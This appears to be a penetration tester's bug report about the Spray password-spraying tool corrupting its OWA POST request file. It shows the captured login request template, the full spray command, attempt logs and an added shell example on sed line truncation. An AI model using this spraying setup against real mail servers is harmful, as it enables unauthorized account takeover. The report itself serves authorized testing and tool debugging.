I'm attempting to spray an OWA instance I know should contain some hits, but after letting a spray job run overnight it had gone through a decent chunk of the password list and found nothing, which I thought was odd since this was against a userlist of 600+. I noticed that the spray-logs.txt file had a very large number in front of each attempt, which didn't match up with what I'd expect the byte size of a failed attempt to be. I double-checked the post request file to make sure I didn't mess something up, and noticed that the IP in the host header was missing some digits. At first I thought I must have screwed it up when I pasted that data in from Burp, but then I realized every line had some characters chopped off the end. I set up a new spray to replicate the issue and verified that once the tool starts running, it is editing the supplied post request file in a way that mangles the attack. I redacted the actual IP and domain I was testing against, but you can see below that the post request looks correct before I start, and when checked after the attack is running it is missing the last character of every line.
root@kali:~# cat owa-post-request.txt
POST /owa/auth.owa HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fowa
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Connection: close
Cookie: ClientId=LLDFBDMQA0OGJRADTIGW; PrivateComputer=true; PBack=0
Upgrade-Insecure-Requests: 1
destination=https%3A%2F%2F1.1.1.1%2Fowa&flags=4&forcedownlevel=0&username=§sprayuser§%40redacted.org&password=spraypassword&passwordText=&isUtf8=1
root@kali:~# spray -owa "https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fowa" test-users.txt /opt/Spray/passwords-English.txt 2 35 owa-post-request.txt &
[1] 910149
root@kali:~#
Spray 2.1 the Password Sprayer by Jacob Wilkin(Greenwolf)
11:38:35 Spraying with password: Users Username
11:38:36 Spraying with password: RedactedOrgName1
cat: logs/usernamestoremove.txt: No such file or directory
rm: cannot remove 'logs/usernamestoremove.txt': No such file or directory
root@kali:~# tail logs/spray-logs.txt
56468 joe.shmoe%joe.shmoe
56468 example.person%example.person
56468 abraham.lincoln%abraham.lincoln
56468 singleword%singleword
56468 joe.shmoe%Unity1
56468 example.person%Unity1
56468 abraham.lincoln%Unity1
56468 singleword%Unity1
root@kali:~# cat owa-post-request.txt
POST /owa/auth.owa HTTP/1.
Host: 1.1.1.
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.
Accept-Language: en-US,en;q=0.
Accept-Encoding: gzip, deflat
Referer: https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fow
Content-Type: application/x-www-form-urlencode
Content-Length: 15
Connection: clos
Cookie: ClientId=LLDFBDMQA0OGJRADTIGW; PrivateComputer=true; PBack=
Upgrade-Insecure-Requests:
destination=https%3A%2F%2F1.1.1.1%2Fowa&flags=4&forcedownlevel=0&username=§sprayuser§%40redacted.org&password=spraypassword&passwordText=&isUtf8=
root@kali:~#
I commented out line 177 (sed -i.bak 's/.$//' $postrequest), which seemed to be the culprit for cutting the last character off every line, but I'm still getting way different response sizes than I see in Burp. Not sure if the issue is solved.
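The truncation reported in this thread, reproduced as an added example (not code from the Spray repository): `s/.$//` deletes whatever character ends each line, so it only leaves a file intact when every line ends in a carriage return, which is assumed here to be the case the line was written for. The function names and sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: unconditional vs. conditional last-character stripping.

CR=$(printf '\r')   # a literal carriage return, portable across sed versions

# The expression quoted in the comment above: removes the final character
# of every non-empty line, whatever that character is.
strip_any() { sed 's/.$//'; }

# Conditional form: removes the final character only if it is a CR.
# Safe to run repeatedly and safe on files that already use LF endings.
strip_cr() { sed "s/${CR}\$//"; }

# True when stdin contains at least one carriage return.
has_cr() { grep -q "$CR"; }

# Write a normalized copy instead of editing the caller's file in place,
# so the supplied input is never modified. Arguments: source, destination.
normalize_copy() { strip_cr < "$1" > "$2"; }

# Constructed sample input: the same two lines with LF and with CRLF endings.
lf_sample()   { printf 'Host: 1.1.1.1\nConnection: close\n'; }
crlf_sample() { printf 'Host: 1.1.1.1\r\nConnection: close\r\n'; }

# Demo: LF input loses real data under strip_any, as in the report.
echo "strip_any on LF input:"
lf_sample | strip_any
echo "strip_cr on LF input:"
lf_sample | strip_cr
```

Because the unconditional form is also not idempotent, every additional pass over the same file removes one more character from each line.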